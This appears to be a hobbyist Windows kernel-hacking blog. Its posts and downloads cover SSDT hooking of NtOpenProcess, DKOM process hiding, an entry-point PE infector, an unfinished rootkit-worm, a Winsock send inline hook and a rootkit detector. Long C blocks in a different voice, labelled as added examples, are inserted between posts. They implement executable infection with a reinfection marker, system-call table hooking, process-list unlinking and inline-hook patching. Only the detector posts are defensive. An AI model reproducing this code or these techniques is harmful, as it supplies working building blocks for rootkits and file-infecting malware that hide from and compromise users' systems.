Lack of activity

•August 23, 2010 • 3 Comments

Well, it's been quite a while now since I last updated my blog, yet it's just passed 42,600 hits! Anyway, my time is now predominantly taken up by a new activity, with minimal time spent behind a computer and even less time spent programming. I've taken up flying.

[ General Problem ] EPROCESS-ImageFileName + NtOpenProcessHook

•November 21, 2009 • 1 Comment

OK, well, a few of my pieces of code here rely upon the ImageFileName element within the EPROCESS structure (which you can find in the ntifs_6001.h header I've uploaded). Again, in 7600 it seems to be missing. Weird.
Anyway, the problem was that ImageFileName was returning nothing. Blank. So evidently the offset has changed. I wrote a piece of code to enumerate the base addresses of each EPROCESS structure and then looked at them in WinDbg; have a look:

That screenshot should pretty much give you an idea of what to do: count the bytes and find the new offset.
Previously the offset for ImageFileName was +0x154; now all of a sudden it's +0x174. To find this offset programmatically, scan forward from the EPROCESS of the System process (PsInitialSystemProcess) for the NUL-terminated string "System". That process always exists and always carries that name, so the offset at which the string turns up is the ImageFileName offset for whatever build you happen to be running on.

I have attached an updated version of my NtOpenProcessHook below with the fix.
The hack (it's too crude to call a fix!) lies in the RetrievePID() function, so have a look there for a comparison.
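As an added example (not the RetrievePID() code from the driver above), here is the offset resolution just described, written as user-mode C over constructed fake EPROCESS buffers rather than real kernel memory. In a driver the buffer handed to find_imagefilename_offset would be PsInitialSystemProcess; the cross-check against a second process at the same offset is an extra sanity step that the post does not mention, and the 0xCC filler, the 0x400 scan bound and the process names are all assumptions made for the demo.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ImageFileName is a 16-byte UCHAR array inside EPROCESS (see ntifs_6001.h). */
#define IMAGE_NAME_LEN 16

/* Scan forward from the System process's EPROCESS for the NUL-terminated
 * string "System".  In a driver the base would be PsInitialSystemProcess;
 * scan_len bounds the walk so a wrong base cannot run off into unmapped
 * memory.  Returns the offset, or (size_t)-1 if the name is not found. */
static size_t find_imagefilename_offset(const uint8_t *system_eprocess, size_t scan_len)
{
    static const char needle[] = "System";      /* 7 bytes including the NUL */
    for (size_t off = 0; off + sizeof needle <= scan_len; off++) {
        if (memcmp(system_eprocess + off, needle, sizeof needle) == 0)
            return off;
    }
    return (size_t)-1;
}

/* Cross-check: at the candidate offset every other EPROCESS should also hold
 * a short, printable, NUL-terminated name.  If it does not, the "System" hit
 * was some other field that happened to contain those bytes. */
static bool looks_like_image_name(const uint8_t *eprocess, size_t off)
{
    for (size_t i = 0; i < IMAGE_NAME_LEN; i++) {
        uint8_t c = eprocess[off + i];
        if (c == 0)
            return i > 0;                       /* non-empty and terminated */
        if (c < 0x20 || c > 0x7E)
            return false;                       /* not printable ASCII */
    }
    return false;                               /* no terminator inside the field */
}

/* ---- Constructed demo data: fake EPROCESS blocks, not kernel memory ---- */
#define FAKE_EPROCESS_SIZE 0x400

static void make_fake_eprocess(uint8_t *buf, size_t name_off, const char *name)
{
    memset(buf, 0xCC, FAKE_EPROCESS_SIZE);      /* filler that can never match "System" */
    memset(buf + name_off, 0, IMAGE_NAME_LEN);
    strncpy((char *)(buf + name_off), name, IMAGE_NAME_LEN - 1);
}

typedef struct {
    size_t offset;          /* what the scan found on the System EPROCESS */
    bool   cross_check_ok;  /* the same offset is a valid name on another EPROCESS */
} offset_probe_t;

/* Build a "System" and a "csrss.exe" EPROCESS with ImageFileName at true_off,
 * then resolve the offset the way the text describes and validate it. */
static offset_probe_t probe_imagefilename_offset(size_t true_off)
{
    uint8_t system_ep[FAKE_EPROCESS_SIZE], csrss_ep[FAKE_EPROCESS_SIZE];
    offset_probe_t r;

    make_fake_eprocess(system_ep, true_off, "System");
    make_fake_eprocess(csrss_ep, true_off, "csrss.exe");

    r.offset = find_imagefilename_offset(system_ep, FAKE_EPROCESS_SIZE);
    r.cross_check_ok = r.offset != (size_t)-1 && looks_like_image_name(csrss_ep, r.offset);
    return r;
}

int main(void)
{
    /* 0x154 and 0x174 are the two offsets the post mentions. */
    for (size_t off = 0x154; off <= 0x174; off += 0x20) {
        offset_probe_t r = probe_imagefilename_offset(off);
        printf("ImageFileName offset resolved to +0x%zx (cross-check %s)\n",
               r.offset, r.cross_check_ok ? "ok" : "FAILED");
    }
    return 0;
}
```

The scan matches the terminating NUL as part of the needle, so a longer name such as "SystemSettings.exe" would not be mistaken for the System process; the bound on scan_len is what keeps a bad base pointer from turning into a bugcheck instead of a failed lookup.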

[ Link ] My Old NtOpenProcessHook post
[ C - Source ] New NtOpenProcessHook Driver
[ C - Source ] Old NtOpenProcessHook Driver
[ C - Header ] ntifs_6001.h

[ C ] Entry Point Hook

•January 30, 2009 • 2 Comments

This is an idea I used in the rootkit post below.
Just that extract, explained.
[ .rar ] Project files
[ C - Source ] PEInfect

Unmodified program shown in PE Explorer.
Unmodified program's entry point shown in OllyDbg.

Modified program shown in PE Explorer:

Modified program's entry point shown in OllyDbg:

[C - Unfinished] simple-rootkit-worm?

•January 27, 2009 • Leave a Comment

This was the result of me messing around last November.
It shows just how easy a rootkit with simple worm characteristics can be to write, but I got bored with it and it hasn't progressed for the past two months, so I may as well post it.
What needs to be finished, as far as I can see, is:
-prevent re-modifying the target file's PE header.
-the mailbox system, which makes sure only one copy of the file is running at a time, to guard against driver crashes.
-all the strings need to be encrypted, then decrypted when used and erased afterwards.
-all allocated memory needs to be deallocated.
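The entry-point redirection from the Entry Point Hook post above and the first todo item here (refusing to re-modify an already patched PE header) come down to the same header handling, so here is one added example covering both. It is not the PEInfect code: it parses the PE32 headers by raw offset with bounds checks, swaps AddressOfEntryPoint, and refuses a second pass. The infection marker in the DOS header's reserved e_res[0] word and the header-only demo file (an entry RVA of 0x1000 moved to 0x5000) are assumptions made for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Raw PE32 header offsets (x86 images, as on the XP-era targets of these posts). */
#define DOS_E_MAGIC          0x00   /* "MZ" */
#define DOS_E_RES            0x1C   /* four reserved WORDs, ignored by the loader */
#define DOS_E_LFANEW         0x3C   /* DWORD: file offset of "PE\0\0" */
#define NT_SIGNATURE         0x00004550u
#define NT_OPTIONAL_HEADER   0x18   /* Signature (4) + IMAGE_FILE_HEADER (20) */
#define OPT_MAGIC            0x00   /* 0x10B for PE32 */
#define OPT_ADDRESS_OF_ENTRY 0x10   /* RVA of the entry point */
#define PE32_MAGIC           0x10B

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Locate the optional header of a PE32 image held in memory.  Every access is
 * bounds-checked against len: the file is untrusted input to the infector just
 * as it is to anything else.  Returns NULL if this is not a PE32 file. */
static uint8_t *pe32_optional_header(uint8_t *file, size_t len)
{
    if (len < DOS_E_LFANEW + 4 || rd16(file + DOS_E_MAGIC) != 0x5A4D)
        return NULL;
    uint32_t nt = rd32(file + DOS_E_LFANEW);
    if (nt > len || len - nt < NT_OPTIONAL_HEADER + OPT_ADDRESS_OF_ENTRY + 4)
        return NULL;
    if (rd32(file + nt) != NT_SIGNATURE)
        return NULL;
    uint8_t *opt = file + nt + NT_OPTIONAL_HEADER;
    return rd16(opt + OPT_MAGIC) == PE32_MAGIC ? opt : NULL;
}

static bool pe32_get_entry_point(uint8_t *file, size_t len, uint32_t *rva)
{
    uint8_t *opt = pe32_optional_header(file, len);
    if (!opt) return false;
    *rva = rd32(opt + OPT_ADDRESS_OF_ENTRY);
    return true;
}

/* Infection marker stored in e_res[0]: an assumption for this example, not the
 * method used by the original PEInfect code. */
#define INFECT_MARKER 0x4B52   /* "RK" */

static bool pe32_is_infected(const uint8_t *file, size_t len)
{
    return len >= DOS_E_RES + 2 && rd16(file + DOS_E_RES) == INFECT_MARKER;
}

/* Point the entry point at new_rva, refusing a file that is already marked (the
 * "prevent re-modifying the PE header" item).  The old RVA is handed back so the
 * stub at new_rva can jump to it once it has done its work. */
static bool pe32_redirect_entry_point(uint8_t *file, size_t len, uint32_t new_rva, uint32_t *old_rva)
{
    uint8_t *opt = pe32_optional_header(file, len);
    if (!opt || pe32_is_infected(file, len))
        return false;
    *old_rva = rd32(opt + OPT_ADDRESS_OF_ENTRY);
    wr32(opt + OPT_ADDRESS_OF_ENTRY, new_rva);
    wr16(file + DOS_E_RES, INFECT_MARKER);
    return true;
}

/* ---- Constructed demo: a minimal PE32 header only, not a real executable ---- */
#define DEMO_FILE_LEN   0x100
#define DEMO_NT_OFFSET  0x40
#define DEMO_ORIG_ENTRY 0x1000u
#define DEMO_NEW_ENTRY  0x5000u   /* pretend our stub lives in an appended section */

static void build_demo_pe(uint8_t *file)
{
    memset(file, 0, DEMO_FILE_LEN);
    wr16(file + DOS_E_MAGIC, 0x5A4D);
    wr32(file + DOS_E_LFANEW, DEMO_NT_OFFSET);
    wr32(file + DEMO_NT_OFFSET, NT_SIGNATURE);
    uint8_t *opt = file + DEMO_NT_OFFSET + NT_OPTIONAL_HEADER;
    wr16(opt + OPT_MAGIC, PE32_MAGIC);
    wr32(opt + OPT_ADDRESS_OF_ENTRY, DEMO_ORIG_ENTRY);
}

typedef struct { bool first_ok, second_ok; uint32_t old_entry, entry_now; } infect_demo_t;

static infect_demo_t run_infect_demo(void)
{
    uint8_t file[DEMO_FILE_LEN];
    infect_demo_t r = {0};
    uint32_t dummy;
    build_demo_pe(file);
    r.first_ok  = pe32_redirect_entry_point(file, sizeof file, DEMO_NEW_ENTRY, &r.old_entry);
    r.second_ok = pe32_redirect_entry_point(file, sizeof file, DEMO_NEW_ENTRY, &dummy); /* must refuse */
    pe32_get_entry_point(file, sizeof file, &r.entry_now);
    return r;
}

int main(void)
{
    infect_demo_t r = run_infect_demo();
    printf("first pass %s, entry 0x%x -> 0x%x; second pass %s\n",
           r.first_ok ? "patched" : "refused", r.old_entry, r.entry_now,
           r.second_ok ? "patched (BUG)" : "refused");
    return 0;
}
```

Without the marker check the second pass would overwrite the saved original entry RVA with the stub's own address, and the stub would then jump to itself forever; that is exactly the failure the todo item is guarding against.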

Rootkit:
[ .rar ]Project Files (Driver/Application)
[ C - Source ]Driver
[ C++ - Source ]Main program
ntifs.h

[C] A simple interpreted language

•January 3, 2009 • 5 Comments

Someone asked me the other day about writing a simple scripting language, so I got around to playing around a bit and ended up writing a simple interpreter. In appearance it looks something like a cross between assembly (source, destination operands) and BASIC:

It supports a simple form of loops, variable storage and retrieval, basic (currently limited) conditional statements and variable output.
Download:
-source code here.
-Project Files here (contains script file)
-sample script file

[ C ] NtOpenProcess hook.

•October 4, 2008 • 18 Comments

A 'crude' method of preventing access to a program is to hook NtOpenProcess and deny any request for a handle to the protected process. Simple. The screenshot below shows what happens when I tried to terminate notepad, which at the time was 'protected' by this hook. A detour hook would be preferable to an SSDT pointer change as it is less detectable, but I'll cover that some other time.

[ C - Source ] Driver.c
[ C++ - Source ] DriverControll.cpp
Download the compiled executable.
ntifs.h
NEW post regarding NtOpenProcess hooks

Operation: once the executable has been run and you've entered your target process name (with the .exe!), you are presented with an arrow (-->) and have three commands: HOOK, UNHOOK and EXIT. They're fairly self-explanatory. Unhook before you exit. Make sure you've spelt the process name correctly.

OK, as with many previous things, this is XP only. The call number (the index of NtOpenProcess in the SSDT) would need to be changed for other OS versions. Look here for different call numbers.
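As an added example (not the Driver.c posted above), here is the hook's decision logic written as a user-mode simulation: a fake service table stands in for KeServiceDescriptorTable.ServiceTableBase, a stub stands in for the real NtOpenProcess, and the HOOK/UNHOOK steps swap the table entry exactly as the driver would. Index 0x7A is XP's NtOpenProcess slot and should be checked against a syscall table for the build; the 0x11C table size, PID 1480 for the protected notepad and the dummy handle value are assumptions for the demo. The null-ClientId case is a caveat the text does not mention: it is a legal call, so the hook must pass it through rather than dereference it.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Minimal stand-ins for the kernel types the hook touches. */
typedef long NTSTATUS;
typedef void *HANDLE;
typedef uint32_t ACCESS_MASK;
typedef struct { HANDLE UniqueProcess; HANDLE UniqueThread; } CLIENT_ID;
typedef struct { int placeholder; } OBJECT_ATTRIBUTES;
#define STATUS_SUCCESS       ((NTSTATUS)0x00000000L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
#define PROCESS_TERMINATE    0x0001u

typedef NTSTATUS (*NtOpenProcess_t)(HANDLE *ProcessHandle, ACCESS_MASK DesiredAccess,
                                    OBJECT_ATTRIBUTES *ObjectAttributes, CLIENT_ID *ClientId);
typedef void (*service_fn_t)(void);   /* generic slot type for the table */

/* Simulated SSDT.  On XP the real one is KeServiceDescriptorTable.ServiceTableBase
 * with NtOpenProcess at index 0x7A; other Windows versions use other indices,
 * which is why the tool above is XP-only. */
#define SSDT_ENTRIES             0x11C
#define SSDT_NTOPENPROCESS_INDEX 0x7A
static service_fn_t fake_ssdt[SSDT_ENTRIES];

/* Stand-in for the real NtOpenProcess: always succeeds with a dummy handle. */
static NTSTATUS original_NtOpenProcess(HANDLE *h, ACCESS_MASK a, OBJECT_ATTRIBUTES *o, CLIENT_ID *c)
{
    (void)a; (void)o; (void)c;
    *h = (HANDLE)0x1234;
    return STATUS_SUCCESS;
}

static NtOpenProcess_t saved_NtOpenProcess;   /* pass-through target for everything we allow */
static uintptr_t       protected_pid;         /* the process we refuse handles to */

static NTSTATUS hooked_NtOpenProcess(HANDLE *h, ACCESS_MASK a, OBJECT_ATTRIBUTES *o, CLIENT_ID *c)
{
    /* ClientId is optional: a caller may name the target through ObjectAttributes
     * instead, so a hook that dereferences it blindly will eventually bugcheck. */
    if (c != NULL && (uintptr_t)c->UniqueProcess == protected_pid)
        return STATUS_ACCESS_DENIED;
    return saved_NtOpenProcess(h, a, o, c);
}

/* HOOK: remember the original entry, then swap in ours.  In the driver the table
 * is write-protected, so the store is done with CR0.WP cleared (or through an
 * MDL mapping), conventionally via InterlockedExchange. */
static void install_hook(uintptr_t pid_to_protect)
{
    protected_pid = pid_to_protect;
    saved_NtOpenProcess = (NtOpenProcess_t)fake_ssdt[SSDT_NTOPENPROCESS_INDEX];
    fake_ssdt[SSDT_NTOPENPROCESS_INDEX] = (service_fn_t)hooked_NtOpenProcess;
}

/* UNHOOK: restore the saved entry.  This must happen before the driver unloads:
 * a slot still pointing into an unloaded image bugchecks on the next
 * NtOpenProcess from anywhere on the system ("Unhook before you exit"). */
static void remove_hook(void)
{
    fake_ssdt[SSDT_NTOPENPROCESS_INDEX] = (service_fn_t)saved_NtOpenProcess;
}

/* What a user-mode OpenProcess/TerminateProcess ends up doing: dispatch through the table. */
static NTSTATUS dispatch_open_process(CLIENT_ID *cid)
{
    HANDLE h = NULL;
    NtOpenProcess_t fn = (NtOpenProcess_t)fake_ssdt[SSDT_NTOPENPROCESS_INDEX];
    return fn(&h, PROCESS_TERMINATE, NULL, cid);
}

static NTSTATUS open_by_pid(uintptr_t pid)
{
    CLIENT_ID cid = { (HANDLE)pid, NULL };
    return dispatch_open_process(&cid);
}

typedef struct {
    NTSTATUS protected_while_hooked, other_while_hooked, no_cid_while_hooked, protected_after_unhook;
} ssdt_demo_t;

/* Constructed scenario: notepad.exe is PID 1480 (made up), System is PID 4. */
static ssdt_demo_t run_ssdt_demo(void)
{
    ssdt_demo_t r;
    fake_ssdt[SSDT_NTOPENPROCESS_INDEX] = (service_fn_t)original_NtOpenProcess;  /* clean table */
    install_hook(1480);
    r.protected_while_hooked = open_by_pid(1480);
    r.other_while_hooked     = open_by_pid(4);
    r.no_cid_while_hooked    = dispatch_open_process(NULL);
    remove_hook();
    r.protected_after_unhook = open_by_pid(1480);
    return r;
}

int main(void)
{
    ssdt_demo_t r = run_ssdt_demo();
    printf("hooked: pid 1480 -> 0x%08lx, pid 4 -> 0x%08lx, no ClientId -> 0x%08lx; unhooked: pid 1480 -> 0x%08lx\n",
           (unsigned long)r.protected_while_hooked, (unsigned long)r.other_while_hooked,
           (unsigned long)r.no_cid_while_hooked, (unsigned long)r.protected_after_unhook);
    return 0;
}
```

Denying on PID alone is what makes the method crude: a handle already held before the hook went in keeps working, and anything that opens the process by name through ObjectAttributes goes straight past the check.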

[Unfinished - C++]DirectX 2D Tile Engine

•August 31, 2008 • 1 Comment

So I decided to give DirectX a shot and try to create a tile engine (Wikipedia link for those who don't know).

Without much reading or forethought I went ahead and started coding. I'm not really happy with the results; there are quite a few things I would do differently, such as a pixel-based camera rather than a tile-based one, so I'm posting this here and leaving it as is. I'll salvage bits from this code, recode it and see what I come up with.

Anyway, heres a picture of it:

The values in the map file are stored in little-endian format, and the structure of the map file is explained here in picture format.

Source Code (.cpp)
Source Code (.h)
PNG #1
PNG #2

[C++] WINSOCK send hook.

•July 27, 2008 • 6 Comments

I see a few people looking for information on Winsock and WinAPI hooks in general.
Well, here's an easily modifiable inline hook.
It works by overwriting the 5-byte hot-patch prologue at the start of the target function (mov edi,edi / push ebp / mov ebp,esp; note that on pre-XP SP2 systems the prologue is only 3 bytes, so that would need to be changed) with a jump to our function. Our function does whatever it needs to and then jumps back to the original code. However, because those 5 bytes have been overwritten, the hook function has to execute the displaced instructions itself before jumping back to the original function at its sixth byte, or things won't work.

Hook diagram


C/C++ – Source Code

MSDN – send

New Content

•May 28, 2008 • 3 Comments

So it's been just over five months since my last post, which is pretty pathetic, but I'm at a sheer loss of ideas for content.

If you want to see something specific, leave a comment with your thoughts and requests and I'll see what I can do.

Rootkit Detector v2

•December 25, 2007 • 16 Comments

I recently decided to rework a piece of code I wrote earlier this year, and decided to expand upon it.

My intent is to eventually have something resembling a fully fledged rootkit detector, but I think that's still a while off. I did however add a few new functions to my previous version, amongst them the ability to detect both detour (inline) hooks and SSDT pointer hooks, and the ability to detect hidden processes. The latter is something I still need to do a bit of work on, and I'll include it in my next version.

I also had some fun reworking the GUI and came up with a cool way of doing it. I thought it came out looking pretty stylish (as you can see in the screenshot below :P).

You can download it here:
EXE Download (.zip)
Some screenshots:
In action…
The reworked GUI again

And the original programs post

Note: won't work on pre-XP SP2 systems, nor do I think it will work on Vista.
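The Winsock send hook post above and this detector describe the two sides of the same byte patch, so here is one added example covering both; it is not code from either download. It builds the 5-byte jmp written over a hot-patch prologue and the trampoline that replays the displaced bytes, then classifies the function entry the way a detour-hook scanner would. Everything is done on a byte buffer, never on live code, and the three addresses, the 16 bytes of the fake send() entry and the enum names are invented for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint32_t va32_t;   /* 32-bit virtual address: the posts target 32-bit XP */

/* Hot-patch prologue XP SP2+ system DLLs start exported functions with:
 * mov edi,edi ; push ebp ; mov ebp,esp.  Five bytes with an instruction
 * boundary at +5, which is what makes the overwrite safe. */
static const uint8_t HOTPATCH_PROLOGUE[5] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC };

static void     put_le32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static uint32_t get_le32(const uint8_t *p) { return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24); }

/* E9 rel32: displacement relative to the end of the 5-byte instruction.  The
 * subtraction wraps mod 2^32 exactly as the CPU's addition does. */
static void encode_jmp_rel32(uint8_t out[5], va32_t instr_va, va32_t dest_va)
{
    out[0] = 0xE9;
    put_le32(out + 1, dest_va - (instr_va + 5));
}
static va32_t decode_jmp_rel32(const uint8_t *instr, va32_t instr_va)
{
    return instr_va + 5 + get_le32(instr + 1);
}

/* Hook side, step 1: save the bytes about to be overwritten and build the patch.
 * Refuse anything that is not the expected prologue: on another build five bytes
 * could end mid-instruction, and replaying them from the trampoline would run garbage. */
static bool build_inline_patch(const uint8_t *target_code, va32_t target_va, va32_t hook_va,
                               uint8_t saved[5], uint8_t patch[5])
{
    if (memcmp(target_code, HOTPATCH_PROLOGUE, 5) != 0) return false;
    memcpy(saved, target_code, 5);
    encode_jmp_rel32(patch, target_va, hook_va);
    return true;
}

/* Hook side, step 2: the trampoline the hook calls to reach the real function:
 * replay the displaced prologue, then jump to target+5, the first byte left intact. */
#define TRAMPOLINE_LEN 10
static void build_trampoline(const uint8_t saved[5], va32_t trampoline_va, va32_t target_va,
                             uint8_t out[TRAMPOLINE_LEN])
{
    memcpy(out, saved, 5);
    encode_jmp_rel32(out + 5, trampoline_va + 5, target_va + 5);
}

/* Detector side: classify what sits at a function entry.  code must point at six
 * readable bytes.  dest_out gets the jump target for the rel32 and push/ret forms,
 * and the pointer-slot address for the indirect form. */
typedef enum { PROLOGUE_CLEAN, PROLOGUE_JMP_REL32, PROLOGUE_PUSH_RET,
               PROLOGUE_JMP_INDIRECT, PROLOGUE_UNKNOWN } prologue_kind_t;

static prologue_kind_t classify_prologue(const uint8_t *code, va32_t code_va, va32_t *dest_out)
{
    if (memcmp(code, HOTPATCH_PROLOGUE, 5) == 0) return PROLOGUE_CLEAN;
    if (code[0] == 0xE9) { *dest_out = decode_jmp_rel32(code, code_va); return PROLOGUE_JMP_REL32; }
    if (code[0] == 0x68 && code[5] == 0xC3) { *dest_out = get_le32(code + 1); return PROLOGUE_PUSH_RET; }
    if (code[0] == 0xFF && code[1] == 0x25) { *dest_out = get_le32(code + 2); return PROLOGUE_JMP_INDIRECT; }
    return PROLOGUE_UNKNOWN;
}

/* ---- Constructed scenario; the addresses are invented for the example ---- */
#define TARGET_VA     0x71AB4C27u   /* pretend ws2_32!send lives here */
#define HOOK_VA       0x10001000u   /* our replacement function */
#define TRAMPOLINE_VA 0x10002000u   /* executable scratch page holding the trampoline */

typedef struct {
    bool patched;
    prologue_kind_t before, after;
    va32_t detected_dest;
    uint8_t trampoline[TRAMPOLINE_LEN];
} hook_demo_t;

static hook_demo_t run_hook_demo(void)
{
    /* First 16 bytes of a hot-patchable function: prologue, sub esp,10h, push ebx/esi/edi ... */
    uint8_t image[16] = { 0x8B,0xFF,0x55,0x8B,0xEC, 0x83,0xEC,0x10, 0x53,0x56,0x57, 0x8B,0x7D,0x08, 0x90,0x90 };
    hook_demo_t r = {0};
    uint8_t saved[5], patch[5];
    va32_t dest = 0;

    r.before  = classify_prologue(image, TARGET_VA, &dest);
    r.patched = build_inline_patch(image, TARGET_VA, HOOK_VA, saved, patch);
    if (r.patched) {
        memcpy(image, patch, 5);   /* in the real hook: VirtualProtect(PAGE_EXECUTE_READWRITE) first */
        build_trampoline(saved, TRAMPOLINE_VA, TARGET_VA, r.trampoline);
    }
    r.after = classify_prologue(image, TARGET_VA, &dest);
    r.detected_dest = dest;
    return r;
}

int main(void)
{
    hook_demo_t r = run_hook_demo();
    printf("before: kind %d, after: kind %d, jump target 0x%08x (hook at 0x%08x)\n",
           r.before, r.after, r.detected_dest, HOOK_VA);
    return 0;
}
```

The detector only has to read the first byte or two to spot the rel32 jump, which is why the post calls this kind of hook easy to find; decoding the target and checking whether it lands outside the module that owns the function is what separates a rootkit's hook from the legitimate ones the later post warns about.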

[ C ] Hiding processes by the DKOM method

•October 31, 2007 • 7 Comments

Right, so this particular post assumes that you've got some knowledge of what DKOM (Direct Kernel Object Manipulation) is and of the specifics of the _EPROCESS structure, in particular the ActiveProcessLinks list that this method unlinks the target process from.

Well anyway, you can view the code here.

Enjoy ;)
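As an added example (not the linked code), here is the unlink in user-mode C over a cut-down fake EPROCESS and a simulated PsActiveProcessHead, run twice: once with the entry's own links pointed back at itself after the unlink, and once without. The second run shows the failure mode a practitioner wants to know about: when the hidden process later exits, the kernel's own RemoveEntryList writes through the entry's stale Flink/Blink into whatever now occupies the old neighbours' memory. The four processes, their PIDs and the field layout are invented for the demo.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* LIST_ENTRY and CONTAINING_RECORD as in ntddk.h. */
typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;
#define CONTAINING_RECORD(addr, type, field) ((type *)((char *)(addr) - offsetof(type, field)))

/* Cut-down EPROCESS with only the fields the walk needs; real offsets differ per build. */
typedef struct {
    uintptr_t  UniqueProcessId;
    LIST_ENTRY ActiveProcessLinks;
    char       ImageFileName[16];
} FAKE_EPROCESS;

static LIST_ENTRY process_list_head;   /* stands in for PsActiveProcessHead */

static void list_init(LIST_ENTRY *head) { head->Flink = head->Blink = head; }
static void list_insert_tail(LIST_ENTRY *head, LIST_ENTRY *e)
{
    e->Flink = head; e->Blink = head->Blink;
    head->Blink->Flink = e; head->Blink = e;
}
/* RemoveEntryList: what the kernel does to ActiveProcessLinks when a process dies. */
static void list_remove(LIST_ENTRY *e)
{
    e->Blink->Flink = e->Flink;
    e->Flink->Blink = e->Blink;
}

/* DKOM hide: unlink the EPROCESS from the active list.  With self_link the entry's
 * Flink/Blink are pointed at itself so the kernel's exit-time RemoveEntryList is a
 * no-op.  Without it the entry keeps stale pointers to its old neighbours. */
static void dkom_hide_process(FAKE_EPROCESS *p, bool self_link)
{
    LIST_ENTRY *e = &p->ActiveProcessLinks;
    list_remove(e);
    if (self_link) e->Flink = e->Blink = e;
}

/* Walk the list the way a PID enumerator (or a detector) does. */
static int count_visible(const LIST_ENTRY *head)
{
    int n = 0;
    for (const LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) n++;
    return n;
}
static bool pid_visible(const LIST_ENTRY *head, uintptr_t pid)
{
    for (const LIST_ENTRY *e = head->Flink; e != head; e = e->Flink)
        if (CONTAINING_RECORD(e, FAKE_EPROCESS, ActiveProcessLinks)->UniqueProcessId == pid)
            return true;
    return false;
}
/* Every Flink must be matched by the neighbour's Blink; otherwise the list is corrupt. */
static bool list_consistent(const LIST_ENTRY *head)
{
    for (const LIST_ENTRY *e = head; ; e = e->Flink) {
        if (e->Flink->Blink != e) return false;
        if (e->Flink == head) return true;
    }
}

typedef struct { int before, after_hide, after_exit; bool hidden_gone, consistent_after_exit; } dkom_demo_t;

/* Constructed scenario: four fake processes.  Hide notepad (PID 1480, made up),
 * let csrss exit and have its EPROCESS freed, then let the hidden process exit. */
static dkom_demo_t run_dkom_demo(bool self_link)
{
    FAKE_EPROCESS procs[4] = {
        { 4,    { 0, 0 }, "System" },
        { 600,  { 0, 0 }, "csrss.exe" },
        { 1480, { 0, 0 }, "notepad.exe" },
        { 2044, { 0, 0 }, "cmd.exe" },
    };
    dkom_demo_t r;
    list_init(&process_list_head);
    for (int i = 0; i < 4; i++) list_insert_tail(&process_list_head, &procs[i].ActiveProcessLinks);

    r.before = count_visible(&process_list_head);
    dkom_hide_process(&procs[2], self_link);
    r.after_hide  = count_visible(&process_list_head);
    r.hidden_gone = !pid_visible(&process_list_head, 1480);

    list_remove(&procs[1].ActiveProcessLinks);     /* csrss exits normally ... */
    memset(&procs[1], 0, sizeof procs[1]);         /* ... and its pool block is freed and reused */
    list_remove(&procs[2].ActiveProcessLinks);     /* the hidden process exits */

    r.after_exit = count_visible(&process_list_head);
    r.consistent_after_exit = list_consistent(&process_list_head);
    return r;
}

int main(void)
{
    dkom_demo_t safe = run_dkom_demo(true), naive = run_dkom_demo(false);
    printf("self-linked:  %d -> %d -> %d visible, list %s\n", safe.before, safe.after_hide,
           safe.after_exit, safe.consistent_after_exit ? "intact" : "CORRUPT");
    printf("naive unlink: %d -> %d -> %d visible, list %s\n", naive.before, naive.after_hide,
           naive.after_exit, naive.consistent_after_exit ? "intact" : "CORRUPT");
    return 0;
}
```

In the simulation the stale write lands in a buffer that still exists, so the damage shows up only as a Blink that no longer matches its neighbour; in the kernel the same write goes into freed pool and ends in a bugcheck the next time anything walks the list backwards.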

SSDT Hook/Rootkit Detector.

•October 16, 2007 • 5 Comments

So I was bored the other day and wanted to code something that would get me back into coding as I’ve had a bit of a break.

This is the result:

Screenshot

I wrote a quick unhook function, but it's erratic at best and keeps BSOD'ing me... So I'll update this once I've got that working flawlessly.

If it DOES pick something up, make a note of what it is, because it may be perfectly legitimate. For instance, various AVs hook NtOpenProcess to protect their main process. However, if it picks up something like NtQueryDirectoryFile (the call a rootkit hooks to hide files from directory listings), chances are you've got a rootkit. And if it doesn't pick anything up... that's a good thing.

In the pic I hooked several items, for demonstration purposes.

Driver: 90% inline assembly, 10% C.
GUI: 100% C++.

If you want, you can download it here.

Note: I'm 99.99% sure it won't work on Vista, so it's confined to all versions of Windows XP.

 